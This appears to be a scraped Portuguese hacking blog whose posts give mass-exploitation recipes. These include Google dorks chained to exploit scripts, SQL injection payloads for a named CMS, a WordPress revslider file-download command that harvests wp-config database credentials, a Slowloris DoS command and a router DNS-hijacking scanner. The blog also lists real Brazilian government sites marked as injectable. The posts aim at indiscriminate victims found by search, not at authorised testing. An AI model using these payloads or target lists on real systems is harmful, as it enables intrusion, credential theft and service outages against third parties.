TOOL DORKING SCANNER INURLBR 1.0:https://github.com/googleinurl/SCANNER-INURLBR
TOOL lfiINURL:
https://github.com/googleinurl/lfiINURL
COMMAND EX:
------------------------------------------------------
inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&index.p=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'include=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&include=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'cn+page=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'cn+page=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'
------------------------------------------------------
USE linux..
TOOL DORKING SCANNER INURLBR 1.0
Postado por
Unknown
às
11:30
0
comentários
Marcadores:
Exploits,
Kali Linux,
Pentest
(0DAY) WebDepo - SQL injection
Postado por
Unknown
às
06:41
EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL
Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepo, o mesmo possui falha de file_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.AUTOR: Cleiton Pinheiro / Nick: GoogleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
Pastebin: http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YOUTUBE: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil
VENTOR: http://www.webdepot.co.il
GET VULN: wood=(id) / $wood=intval($_REQUEST['wood'])
-----------------------------------------------------------------------------
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
DBMS: 'Microsoft Access'
Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
-----------------------------------------------------------------------------
http://target.us/text.asp?wood=(id)+Exploit
GOOGLE DORK: inurl:"text.asp?wood="
GOOGLE DORK: site:il inurl:"text.asp?wood="
GOOGLE DORK: site:com inurl:"text.asp?wood="
Exploit: Clique Aqui
Execute exploit:
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'
EXPLOIT MASS USE SCANNER INURLBR
COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'"
DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
A segunda falha:
Exploit fckeditor 2015
Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk
Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk
GOOGLE DORK: inurl:"/text.asp?wood=" site:il
Exploit: -admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
POC:
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
[2] - http://target.us/userfiles/file/{YOU_FILE}
0
comentários
Marcadores:
0day,
Exploits,
Pentest
Hackers criam ferramenta que faz ataques DDoS em linhas telefônicas !!
Postado por
Unknown
às
11:24
Não são só os sites e serviços da internet que estão sujeitos aos conhecidos ataques de negação de serviço – telefones comuns, sejam eles celulares ou não, também estão sujeitos a sofrerem golpes desse tipo. É o que revelou o site The Register que, nesta segunda-feira (23), trouxe a história do TNT Instant Up, um aparelho criado por hackers do leste da Europa voltado justamente para esse fim.
Vendido na internet por valores que variam entre US$ 500 e US$ 1.200, o equipamento utiliza um sistema interligado de modems e cartões SIM para bombardear um ou mais números com ligações. As chamadas são vazias e servem apenas para congestionar as linhas, impedindo que usuários legítimos consigam acessá-las.
A ideia, aqui, é basicamente a mesma de qualquer ataque DDoS: impedir o uso de serviços. Só que, aqui, eles não são retirados do ar, mas sim acabam apenas congestionados e inutilizáveis enquanto durarem os ataques. A prática está sendo chamada de TDoS, sigla em inglês para Telephone Denial of Service, ou negação de serviço telefônico.
O problema é que, na nova modalidade, os resultados seriam muito mais perigosos. Enquanto a maioria dos golpes desse tipo causam perdas financeiras para as empresas afetadas e inconveniência para seus usuários, o TDoS seria capaz de, por exemplo, bloquear serviços de emergência.
Além disso, o TNT Instant Up seria simples o suficiente para que literalmente qualquer pessoa conseguisse utilizá-lo. Em um vídeo demonstrativo disponível livremente no YouTube, um dos vendedores da ferramenta a exibe em funcionamento com vários celulares ao mesmo tempo, com números que são inseridos a partir de um software rodando em um computador. A negociação com o “comerciante” acontece pelo ICQ ou e-mail e o produto é enviado pelo correio como qualquer eletrônico convencional.
O FBI já teria identificado pelo menos duas circunstâncias em que um dispositivo como o TNT Instant Up foi utilizado para impedir o acesso de usuários a serviços de plano de saúde ou linhas de emergência. Apesar disso, não identificou crimes que estariam sendo realizados em relação ao ataque e que justificariam o bloqueio da linha e a tentativa de impedir que cidadãos contatem a polícia, por exemplo.
De acordo com as informações da IntelCrawler, uma fornecedora de sistemas e soluções de segurança, assim como nos ataques de negação de serviço na web, não existem maneiras de se proteger contra essa nova modalidade de golpe, a não ser, claro, desconectar a linha para que o aparelho pare de tocar sem parar. Uma alternativa que simplesmente não existe para serviços de emergência, principalmente, que agora se tornam alvo de mais uma ferramenta que pode ser usada por qualquer pessoa, seja qual for a intenção dela.
0
comentários
Marcadores:
Noticias
Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP
Postado por
Unknown
às
19:27
Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP está aberta !!!
A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015.
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN(English Version)
As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes).
Datas Importantes:
- Data final para submissão de palestras e oficinas: 20/04
- Notificação aos autores selecionados: 23/03
- Divulgação da Agenda: 24/04
- Início das inscrições: 24/04
- Co0L BSidesSP v11: 24/05
A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015.
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN(English Version)
As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes).
Datas Importantes:
- Data final para submissão de palestras e oficinas: 20/04
- Notificação aos autores selecionados: 23/03
- Divulgação da Agenda: 24/04
- Início das inscrições: 24/04
- Co0L BSidesSP v11: 24/05
0
comentários
Marcadores:
Noticias
Sites .Gov Vulnerável SQLi
Postado por
Unknown
às
14:57
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
0
comentários
Marcadores:
BackTrack - SQLi
0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification
Postado por
Unknown
às
01:19
-------------------------------------------------------------------------------------------
Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
-------------------------------------------------------------------------------------------
Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------
Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------
All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL
Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.
[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php
Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR
Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
Brief introduction --comand
[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php
Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR
Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
Example: --comand-vul {command}
Usage: --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
--comand-vul './exploit.sh _TARGET_ output.txt'
--comand-all Use this commmand to specify a single command to EVERY URL found.
Example: --comand-all {command}
Usage: --comand-all 'nmap sV -p 22,80,21 _TARGET_'
--comand-all './exploit.sh _TARGET_ output.txt'
Observation:
_TARGET_ will be replaced by the URL/target found, although if the user
doesn't input the get, only the domain will be executed.
_TARGETFULL_ will be replaced by the original URL / target found.
-------------------------------------------------------------------------------------------
INURLBR ADVANCED CONTROL
php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'
[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR Video Aqui
[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution Video Aqui
[TUTORIAL] - Getting access to the Wordpress panel Video Aqui
REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
0
comentários
Marcadores:
Kali Linux,
Pentest
0x06 - SCANNER RouterhuntertBR 1.0
Postado por
Unknown
às
01:09
Inicialmente o RouterhunterBR foi desenvolvido para explorar vulnerabilidades DNSChanger em routers caseiros que possuem falhas em paginas sem autenticação dentro do roteador, Assim modificando o DNS padrão dentro do roteador.
O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunterBR.
Explora:
- 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
- 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
- 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploit
Feito em PHP faz varreduras em faixas de ips pré-definidas ou alearias com números limites, até mesmo usando um arquivo fonte como referencias de ip.
- SET PROXY.
- USER AGENT RANDÔMICO.
- SAVE OUTPUT FILE.
[DOWNLOAD]
1 comentários
Marcadores:
Pentest
0x05 - INURLMAIL
Postado por
Unknown
às
01:07
Busca lista de emails. Objetivo usar o motor de busca Google para capturar email list. A cada URL encontrada pelo buscador, será efetuado um filtro capturando os emails contidos na URL.
[DOWNLOAD]
0
comentários
Marcadores:
Pentest
MINI EXPLOIT: Joomla Simple Photo Gallery - SQL injection + VIDEO
Postado por
Unknown
às
01:04
Usando miniexploit para explorar em massa vários alvos.
Title: Joomla Simple Photo Gallery - SQL injection
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap
POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]
Comando SQLMAP de exploração:
sqlmap -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba
DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/
Agora vamos organizar nosso comando INURLBR para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'
Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection:
http://pastebin.com/Gb5uhPKW
File: miniexploit.php
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap
POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]
Comando SQLMAP de exploração:
sqlmap -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba
DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/
Agora vamos organizar nosso comando INURLBR para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.
--dork Defines which dork the search engine will use.Parâmetro organizado:
Example: --dork {dork}
Usage: --dork 'site:.gov.br inurl:php? id'
- Using multiples dorks:
Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
Usage: --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'
Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection:
http://pastebin.com/Gb5uhPKW
File: miniexploit.php
Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php
Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php
Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"
REF:
http://www.exploit-db.com/exploits/36385/
https://github.com/sqlmapproject/sqlmap/wiki/Usage
http://blog.inurl.com.br/2015/03/desenvolvendo-mini-exploits-otimizando.html
http://www.exploit-db.com/exploits/36385/
https://github.com/sqlmapproject/sqlmap/wiki/Usage
http://blog.inurl.com.br/2015/03/desenvolvendo-mini-exploits-otimizando.html
0
comentários
Marcadores:
Kali Linux,
Pentest
Tutorial Slowloris [PT-BR] - BackTrack
Postado por
Unknown
às
00:28
Este é o mais tradicional e eficiente DoS(Denial of Service) de conhecimento público, que conheço.
Se você está querendo deixar um servidor HTTP lento, ou mesmo sair do ar, este é adequado para tanto.
Obvio, que estamos considerando serviços HTTP sem proteção para DoS deste tipo, que é a maioria, por incrível que possa parecer.
Este pode ser baixado em Slowloris Download
Se você está querendo deixar um servidor HTTP lento, ou mesmo sair do ar, este é adequado para tanto.
Obvio, que estamos considerando serviços HTTP sem proteção para DoS deste tipo, que é a maioria, por incrível que possa parecer.
Este pode ser baixado em Slowloris Download
Falemos sobre alguns exemplos:
Para fazer um DoS na porta 80(padrão HTTP), com 500 conexões simultâneas, com 2000 segundos de timeout de janela TCP e incremento de 5 segundos para o timeout TCP, faça como abaixo:
perl slowloris.pl -dns www.dominio.com.br -port 80 -timeout 2000 -num 500 -tcpto 5
Para fazer um DoS na porta 80(padrão HTTP), com 500 conexões simultâneas, com 2000 segundos de timeout de janela TCP e incremento de 5 segundos para o timeout TCP, faça como abaixo:
perl slowloris.pl -dns www.dominio.com.br -port 80 -timeout 2000 -num 500 -tcpto 5
Até Mais
0
comentários
Marcadores:
BackTrack - SQLi
Tutorial: Explorando vulnerabilidade em roteador tp-link
Postado por
Unknown
às
21:27
Olá
Gostaria de mostrar dessa vez uma vulnerabilidade encontrada nos roteadores TP-Link WR740N, WR740ND and WR2543ND
Essa vulnerabilidade permite a captura do conteúdo do arquivo shadow que contém as senhas de acesso ao roteador.
Para conseguir essa informação você pode usar o burp-suite disponível no backtrack, para isso abra a ferramenta, vá em repeater, digite o ip do alvo e clique em go. após isso vc pode editar a requisição conforme abaixo e clicar em go novamente o resultado será semelhante ao abaixo.
Agora com um pouco mais de trabalho vc consegue consegue quebrar essa senha, mas aí é assunto pra outro post.
Espero que tenham gostado.
Não se esqueça de compartilhar.
Abraços
Dica para pentest: Descobrindo contas de usuário no Oracle com o Nmap
Postado por
Unknown
às
21:26
Olá a todos mais uma vez
Gostaria de passar hoje uma dica para quem for executar um pentest, ou apenas para aprendizado mesmo.
Com essa dica é possível obter informações como SID de um BD Oracle e também fazer o levantamento de contas de usuário disponíveis usando apenas o nmap.
basta fazer o seguinte:
Execute o comando:
nmap --script oracle-sid-brute 192.168.0.12
O resultado será algo semelhante ao abaixo onde no nosso caso o SID é o ORCL
Feito isso basta executar o próximo comando:
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL 192.168.0.12
Com isso obtemos uma lista de contas disponíveis no servidor de banco de dados oracle.
Espero que tenham gostado da dica e não se esqueça de compartilhar
Abraços
0
comentários
Marcadores:
Nmap
Tutorial: Usando o nmap para verificação de vulnerabilidades
Postado por
Unknown
às
21:26
Olá a todos mais uma vez
Desta vez gostaria de mostrar pra vocês como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:
nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)
"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"
A resposta será algo parecido com isso informando se o alvo é vulnerável ou não
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: regsvc DoS: NOT VULNERABLE
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui
0
comentários
Marcadores:
Nmap
Tutorial: Usando nmap para listar plugins do WordPress
Postado por
Unknown
às
21:25
Bem vindos novamente
Dessa vez vou mostrar como usar a poderosa ferramenta do nmap para listar plugins instalados em uma instalação do wordpress
"nmap --script=http-wordpress-plugins --script-args
http-wordpress-plugins.root="/blog/",
http-wordpress-plugins.search=500 <targets>"
O Resultado será uma lista com os plugins que foram localizados na instalação do wordpress.
Se gostou da dica, por favor compartilhe!
Até a próxima
0
comentários
Marcadores:
Nmap
Tutorial: Instalando e fazendo as configurações iniciais do Kali Linux no Virtual Box
Postado por
Unknown
às
21:24
Olá a todos
Gostaria de mostrar pra vocês como instalar e configurar o Kali Linux no Virtual Box bem como fazer as configurações iniciais que na minha opinião são indispensáveis.
O Kali Linux é uma evolução do Backtrack e pode ser baixado aqui http://www.kali.org, ele é mantido pela mesma empresa de segurança do Backtrack.
Algumas vantagens que vi no Kali é que ele é baseado em Debian e muitas ferramentas que davam algum problema no Backtrack, aqui até o momento funcionam sem problemas.
Vou mostrar como criar a máquina virtual, instalar o Kali, instalar o VBOX additions, TOR e também o EtherAPE que tinha no backtrack e não por padrão no Kali. No final vou colocar um link com uma série de tutoriais que podem ser executados usando o Kali. Vamos lá?
1 – Criar a máquina virtual:
Vamos criar uma nova e atribuir um nome
Aqui vamos atribuir a quantidade de memória RAM, no caso coloquei 1GB
Vá avançando nas opções padrão até chegar no tamanho do disco, no caso, coloquei 50GB
